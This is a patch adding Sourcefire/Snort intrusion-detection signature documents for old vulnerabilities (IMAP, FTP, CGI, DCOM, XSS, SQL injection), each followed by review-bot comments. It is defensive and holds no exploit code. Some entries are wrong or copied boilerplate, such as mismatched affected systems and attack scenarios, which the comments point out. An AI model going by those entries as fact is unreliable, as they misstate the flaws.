+Affected Systems:
+	University of Washington imapd versions 10.234 or 12.264. 
+
+--
+Attack Scenarios:
+An attacker with an IMAP account on the server can send a sufficiently
+long LSUB command to the IMAP server, creating a buffer overflow
+condition. This can then allow the attacker to gain shell access on the
+compromised server, possibly leading to the execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple. Exploits exist, but the user must have a valid IMAP account on
+the server.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate patches for your operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Vulneratility Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/1110
+
+CVE
+http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=CVE-2000-0284 
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=10374
+
+--
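Review bot: "Sourcefire Vulneratility Research Team" in Contributors should read "Vulnerability". The Affected Systems entry and the CVE URL both carry trailing whitespace; the stray space after the CVE link will be copied along with the URL, so strip it. "University of Washington imapd versions 10.234 or 12.264" reads better as "version 10.234 or 12.264".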
--- /dev/null
+++ b/doc/signatures/1995.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1995
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
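Review bot: the Summary says only "a known vulnerability in a CGI web application", so the reader cannot tell which script or application sid 1995 matches; this is the same template used for the other generic CGI rules in this patch and should name the specific target. Smaller points: "running ona web server" should be "on a web server", "attackers choosing" should be "attacker's choosing" (twice), and the line "relationships between the victim server and other hosts can be exploited by the attacker." is not wrapped at the width used by the rest of the file.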
--- /dev/null
+++ b/doc/signatures/584.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+584
+
+--
+Summary:
+This event is generated when an attempt is made to probe a host for the
+rusers RPC service.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+The rusers RPC service is used to remotely list all logged in users on a
+machine. This information may be useful to an attacker when targeting a
+remote host.
+
+--
+Affected Systems:
+	All systems running the rusers RPC service
+ 
+--
+Attack Scenarios:
+An attacker runs a vulnerability assessment tool, or the standard Unix
+rusers command.  The attacker may use information gleaned from this to
+better target his attacks.
+
+--
+Ease of Attack:
+Simple. Tools to probe the rusers service come standard with most Unix variants.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the rusers service.
+
+Disallow access to RPC services from hosts external to the protected
+network
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
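Review bot: "Original document author unkown" in Contributors should read "unknown". Also "Rule:  " carries trailing spaces, there is a whitespace-only line after the Affected Systems entry, "None Known" should be "None known" to match the other documents, and "network" at the end of the second Corrective Action paragraph is missing its full stop.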
--- /dev/null
+++ b/doc/signatures/1595.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1595
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow vulnerability associated with FrontPage Server Extension software.
+
+--
+Impact:
+Remote access.  This attack may permit exeuction of arbitrary commands on the vulnerable server.
+
+--
+Detailed Information:
+Microsoft FrontPage 97 and 98 Server Extensions are shipped with htimage.exe and imagemap.exe files that provide image-mapping support on the server for legacy browsers.  There is a vulnerability associated with the htimage.exe file because of unchecked buffers that may permit execution of arbitrary code on the vulnerable server. 
+
+--
+Affected Systems:
+Microsoft Exchange Server 5.5 and Microsoft Exchange Server 5.5 SP1, SP2, SP3, SP4
+
+--
+Attack Scenarios:
+An attacker can craft a special URL referencing the htimage.exe file that causes a buffer overflow, allowing execution of arbitrary commands on the vulnerable server.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Remove the htimage.exe and imagemap.exe files from the server.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+nessus
+http://cgi.nessus.org/plugins/dump.php3?id=10376
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0256
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0122
+
+Bugtraq
+http://www.securityfocus.com/bid/1117
+
+--
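Review bot: Affected Systems lists "Microsoft Exchange Server 5.5 and Microsoft Exchange Server 5.5 SP1, SP2, SP3, SP4", but Summary and Detailed Information describe a buffer overflow in htimage.exe shipped with FrontPage 97 and 98 Server Extensions; the affected-product line looks copied from another document and should name the FrontPage Server Extensions versions instead. Also "exeuction" in Impact should read "execution".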
--- /dev/null
+++ b/doc/signatures/1510.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1510
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
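Review bot: this is the same generic CGI template as 1995.txt with only the Sid changed, so nothing here tells the reader what sid 1510 actually detects; Summary and Detailed Information should name the script or application the rule matches. The template typos carry over as well: "running ona web server" and "attackers choosing".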
--- /dev/null
+++ b/doc/signatures/100000153.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid: 
+100000153
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a
+buffer overflow associated with MDaemon IMAP authentication
+processing.
+
+--
+Impact:
+A successful attack can permit a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable
+server.
+
+--
+Detailed Information:
+The MDaemon IMAP server allows basic authentication to be
+exchanged between the client and server.  A vulnerability
+exists allowing an unauthenticated user to cause a buffer
+overflow by crafting an overly long authentication reply
+to a server challenge.  This can allow execution of arbitrary
+code on a vulnerable server.
+
+--
+Affected Systems:
+Alt-N MDaemon prior to 8.0.4
+
+--
+Attack Scenarios:
+An attacker can request IMAP authentication and reply to
+a server challenge with an overly long response, causing
+a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+Other:
+
+--
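Review bot: the closing "Additional References" heading is missing its colon and is followed by an empty "Other:" line, unlike the other documents in this patch, which use "Additional References:" and omit empty sub-headings. "Rule: ", "Sid: " and the "-- " separator after the Sid also carry trailing whitespace. Since Affected Systems gives a precise boundary ("Alt-N MDaemon prior to 8.0.4"), a vendor advisory or vulnerability database reference would be expected here rather than an empty section.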
--- /dev/null
+++ b/doc/signatures/1878.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1878
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
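Review bot: same generic CGI template again (compare 1995.txt and 1510.txt in this patch), so the document does not say what sid 1878 matches; please name the script or application in Summary and Detailed Information and fix the carried-over "ona" and "attackers choosing" typos.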
--- /dev/null
+++ b/doc/signatures/1734.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1734
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow or denial of service vulnerability associated with FTP USER command. 
+
+--
+Impact:
+Remote access or denial of service.  A successful attack can cause a
+denial of service or allow remote execution of arbitrary commands with
+privileges of the process running the FTP server. 
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit various
+vulnerabilities associated with the FTP USER command of different FTP
+servers. It is possible to cause a denial of service attack or gain
+remote access to execute arbitrary commands with the privileges of the
+process running the FTP server by sending an overly long argument with
+the FTP USER command. 
+
+--
+Affected Systems:
+	bftpd 1.0.11.
+	BlackMoon FTP Server 1.0 through 1.5. 
+	CesarFTPD 0.98b. 
+	A-FTP Anonymous FTP Server.
+	Argosoft FRP server 1.0.
+	TYPSoft FTP Server 0.78. 
+	AnalogX proxy server 4.04 and earlier 
+	Dragon FTP server.
+
+--
+Attack Scenarios:
+An attacker can supply an overly long file argument with the USER
+command, causing a denial of service or buffer overflow.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
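Review bot: Attack Scenarios says "An attacker can supply an overly long file argument with the USER command", but USER takes a username, and Detailed Information correctly says "an overly long argument with the FTP USER command"; drop "file". In Affected Systems, "Argosoft FRP server 1.0" looks like a typo for "FTP server" given the rest of the list, and the entries are inconsistently punctuated (some end with a period, "AnalogX proxy server 4.04 and earlier" has none, several carry trailing spaces). Additional References is empty despite eight named affected products.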
--- /dev/null
+++ b/doc/signatures/2531.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2531
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
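Review bot: "An attcker needs to make an SSL request" in Attack Scenarios should read "attacker". "Apply the appropriate vendor supplied patches" in Corrective Action is missing its full stop, and Additional References is empty although Affected Systems names specific Windows versions, so the vendor bulletin should be cited.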
--- /dev/null
+++ b/doc/signatures/100000838.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000838
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "PhotoCycle" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "phppage" parameter in the "photocycle.php" script used by the "PhotoCycle" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using PhotoCycle
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
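Review bot: the Impact section ("Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing") is the generic CGI boilerplate and overstates a cross site scripting issue; Attack Scenarios correctly describes a malicious link that steals information from the user who follows it, so Impact should describe client-side script execution and session or credential theft rather than server compromise. Formatting: the file opens with two blank lines, and the "--" separators after the Sid, after Affected Systems and after Contributors are not preceded by a blank line as they are elsewhere.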
--- /dev/null
+++ b/doc/signatures/285.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 
+285
+
+--
+Summary:
+This event generated when an attempt is made to exploit a buffer overflow in the pop2 service.
+
+--
+Impact: 
+Remote access.  This attack may permit the execution of arbitrary commands on the vulnerable host with the privileges of the user "nobody".
+
+--
+Detailed Information:
+Access to the user "nobody" can be obtained with pop2 or pop3 servers that support "anonymous proxy".  "Anonymous proxy" permits the use of a proxy pop server to access mail on another pop server where the user has a valid account.  This access to the proxy server as user "nobody".  A buffer overflow exists because of improper user input filtering, allowing the attacker to enter an overly long argment to the FOLD command.  This may permit the execution of arbitrary commands on the vulernable server with the privileges of the user "nobody".
+
+--
+Affected Systems:
+Debian Linux 2.1
+Redhat Linux 4.2, 5.0, 5.1, and 5.2
+University of Washington imap 4.4
+University of Washington pop2d 4.4
+
+--
+Attack Scenarios:
+An attacker may attempt to exploit a vulnerable pop2 server, permitting the execution of arbitrary commands with the privilege of user "nobody". 
+
+--
+Ease of Attack:
+Simple.  Exploit scripts are freely available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the pop2d version 4.51 or later. 
+
+Compile pop2d to not support anonymous proxing.
+
+--
+Contributors:
+Original rule writer unknown
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/283
+
+
+--
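Review bot: the Summary "This event generated when an attempt is made" is missing "is", and in Detailed Information the sentence "This access to the proxy server as user "nobody"." has no verb. Typos in the same paragraph: "argment" for "argument", "vulernable" for "vulnerable"; in Corrective Action "proxing" for "proxying". Attack Scenarios only repeats the Impact section; it should mention the overly long FOLD argument that Detailed Information describes.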
--- /dev/null
+++ b/doc/signatures/3372.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3372
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
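Review bot: Attack Scenarios ("An attacker may make a request for a file with an overly long filename via a network share") does not match Detailed Information, which describes a malformed RPC request to a DCOM port causing a buffer overflow; the scenario appears to have been copied from a different document. Also "Expoit code exists" in Ease of Attack should read "Exploit", and Additional References is empty even though Corrective Action refers to vendor supplied patches that could be cited.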
--- /dev/null
+++ b/doc/signatures/3065.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+3065
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the several commands of an IMAP service. This
+event is concerned with data supplied as a parameter to the
+"append" command.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow
+and the subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+This event is generated when excess data is detected in an IMAP command.
+Some IMAP implementations exhibit programming errors that can lead to a
+buffer overflow condition when excess data is supplied to a static
+buffer.
+
+A vulnerability exists in the way that the Mercury Mail IMAP service
+handles several commands.  An excessively long command argument can
+trigger a denial of service or a buffer overflow and the subsequent
+execution of arbitrary code on a vulnerable server.
+
+--
+Affected Systems:
+	Pegasus Mail Mercury Mail Transport System 3.32
+	Pegasus Mail Mercury Mail Transport System 4.01a
+
+--
+Attack Scenarios:
+An attacker can supplied an overly long command, causing denial of
+service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell<bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
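Review bot: Attack Scenarios reads "An attacker can supplied an overly long command"; should be "can supply". In the Summary, "a buffer overflow associated with the several commands of an IMAP service" should drop "the". Contributors has "Brian Caswell<bmc@sourcefire.com>" without the space before the address used elsewhere. Since the Summary says this rule is specifically about the "append" command, Detailed Information should say so rather than "several commands".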
--- /dev/null
+++ b/doc/signatures/1346.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+1341
+
+--
+Summary:
+Attempted gpp command access via web
+
+--
+Impact:
+Attempt to compile a binary on a host.
+
+--
+Detailed Information:
+This is an attempt to compiile a C or C++ source on a host. The gpp command is the GNU project's C and C++ compiler used to compile C and C++ source files into executable binary files. The attacker could possibly compile a program needed for other attacks on the system or install a binary program of his choosing.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains 'gpp'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. This command may also be requested on a command line should the attacker gain access to the machine. Whenever possible, sensitive files and certain areas of the filesystem should have the system immutable flag set to prevent files from being added to the host. On BSD derived systems, setting the systems runtime securelevel also prevents the securelevel from being changed. (note: the securelevel can only be increased).
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1342
+sid: 1343
+sid: 1344
+sid: 1345
+sid: 1346
+sid: 1347
+sid: 1348
+
+--
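Review bot: the file is doc/signatures/1346.txt but the Sid field says 1341, and the Additional References list of sibling rules includes "sid: 1346" (itself) while omitting 1341; either the Sid line or the file name is wrong, and the cross-reference list should be adjusted to match. The Affected Systems section is missing entirely, unlike the other documents. Typos: "compiile" in Detailed Information, "'gpp'in" needs a space, "outside of it's designated web root" should be "its". The last Corrective Action sentence, "setting the systems runtime securelevel also prevents the securelevel from being changed", is circular; presumably it is meant to say that a raised securelevel prevents the immutable flag from being cleared.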
--- /dev/null
+++ b/doc/signatures/100000676.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000676
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "missing.php" using a remote file being passed as the 
+"header_prog" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "header_prog" parameter in the "missing.php" script used 
+by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
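Review bot: the Summary ends with "may indicate that an exploitation attempt has been attempted", which is redundant; "may indicate an exploitation attempt" reads better. The third paragraph of Detailed Information is the generic "validating the credentials of a client host" boilerplate and does not describe a remote file include, so it should be dropped or reworded around the "header_prog" parameter; it also repeats the "running ona web server" typo. The separators after the Sid, Affected Systems and Contributors lack the preceding blank line, and the hunk ends with an extra empty line.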
--- /dev/null
+++ b/doc/signatures/1469.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1469
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
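Review bot: fourth copy of the generic CGI template in this patch (see 1995.txt, 1510.txt, 1878.txt), so the document still does not identify what sid 1469 matches; please name the script or application, and fix "running ona web server" and "attackers choosing".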
--- /dev/null
+++ b/doc/signatures/2448.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2448
+
+--
+Summary:
+This event is generated when an attempt is made to access the file
+setinfo.hts on a machine using HP Web JetAdmin.
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+HP Web JetAdmin is software used to remotely manage HP networked
+peripheral devices. It may also be used to manage non-HP products also.
+It may be possible for a remote user to execute code of their choosing
+using the web interface.
+
+This is due to insufficient checking of user supplied input in the file
+setinfo.hts.
+
+--
+Affected Systems:
+	HP Web JetAdmin 7.5
+
+--
+Attack Scenarios:
+An attacker can supply any code of their choosing directly to the script
+in question and manipulate any device being managed by the software.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References
+
+--
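Review bot: "Additional References" at the end is missing its colon, unlike the other documents in this patch. In Detailed Information, "It may also be used to manage non-HP products also." repeats "also"; drop one. The "--" separator after the Summary is not preceded by a blank line. Given that Affected Systems names a single version ("HP Web JetAdmin 7.5"), the empty references section should at least cite the vendor advisory.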
--- /dev/null
+++ b/doc/signatures/100000773.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000773
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Blog CMS" application running on a webserver. Access to the file "index.php" with SQL commands being passed as the "archives" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "archives" parameter in the "index.php" script used by the "Blog CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Blog CMS
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
